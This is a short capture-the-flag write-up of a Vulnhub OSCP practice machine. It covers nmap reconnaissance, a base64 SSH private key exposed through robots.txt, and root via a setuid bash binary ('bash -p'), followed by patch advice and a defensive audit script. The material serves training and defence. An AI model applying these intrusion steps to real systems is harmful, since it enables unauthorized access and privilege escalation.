Vulnhub OSCP Prep WriteUp

Jim Solomon
3 min read · Mar 22, 2021

Overview:

This is an OSCP prep box from Vulnhub created by FalconSpy & the InfoSec Prep Discord Server ( https://discord.gg/RRgKaep ). It's relatively easy but still teaches some good stuff for people who are beginning to prepare for the OSCP (I was one of them). The image can be found at the link below. With all that being said, let's just jump in.

Reconnaissance:

ports=$(nmap -p- --min-rate=1000 -T4 192.168.170.154 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports -v -oN sc 192.168.170.154

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91:ba:0d:d4:39:05:e3:13:55:57:8f:1b:46:90:db:e4 (RSA)
| 256 0f:35:d1:a1:31:f2:f6:aa:75:e8:17:01:e7:1e:d1:d5 (ECDSA)
|_ 256 af:f1:53:ea:7b:4d:d7:fa:d8:de:0d:f2:28:fc:86:d7 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.4.2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/secret.txt
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: OSCP Voucher – Just another WordPress site
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

There are 3 ports open; 22 and 33060 are unlikely to have a vulnerability exploitable from outside, so use gobuster to find directories on the web server.

The Foothold:

Also check robots.txt just in case; here there is indeed something on the server: /secret.txt.

secret.txt contains a base64-encoded blob, so base64-decode it.

It turns out to be an id_rsa private key, so we can use ssh -i with this key to log in to the account without a password.

chmod 600 key.txt and ssh into OSCP's account.

PrivEsc to root:

Check setuid

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

bash has the setuid bit set, so run bash -p to spawn a root shell (-p keeps the effective UID instead of dropping privileges).

Patch the vulnerability:

1. Remove the secret file that robots.txt points to from the web server.

2. Remove the setuid bit from bash, which allows an attacker with a shell to gain root.
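As an added example (not part of the original writeup), a small POSIX shell audit covering both fixes: it flags setuid shells using the same find predicate as above, and reports whether each robots.txt Disallow entry points at a world-readable file in the web root. The directory paths are parameters and the list of shell names is an assumption.

```shell
#!/bin/sh
# Defensive audit helpers (added example, not from the original writeup).
# Assumes a POSIX shell with find(1); the shell-name list is an assumption.

# List setuid/setgid files under $1 (same predicate as the writeup).
list_setuid() {
    find "$1" -type f \( -perm -u+s -o -perm -g+s \) 2>/dev/null
}

# Print setuid/setgid files whose name is a shell. bash -p keeps the
# effective uid, so such a file is a ready-made root shell.
flag_setuid_shells() {
    list_setuid "$1" | while read -r f; do
        case "$(basename "$f")" in
            sh|bash|dash|zsh|ksh|csh|tcsh) echo "SETUID SHELL: $f" ;;
        esac
    done
}

# For each Disallow: entry in robots.txt ($1), report whether the target
# exists in the web root ($2) and is world-readable. Disallow only hides a
# path from well-behaved crawlers; to everyone else it advertises it.
check_robots() {
    robots="$1"; webroot="$2"
    grep -i '^Disallow:' "$robots" | while read -r key path; do
        path=$(printf '%s' "$path" | tr -d '\r')
        [ -n "$path" ] || continue
        target="$webroot$path"
        if [ -e "$target" ]; then
            if [ -n "$(find "$target" -prune -perm -o+r -print)" ]; then
                echo "EXPOSED: $path is world-readable at $target"
            else
                echo "PRESENT: $path exists but is not world-readable"
            fi
        else
            echo "ABSENT: $path"
        fi
    done
}
```

Run flag_setuid_shells / against the box after the fix; an empty result means no setuid shell remains.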


Jim Solomon

Christian, Studying Cyber Security and Digital Forensics, Security Consultant at 12security.com | OSCP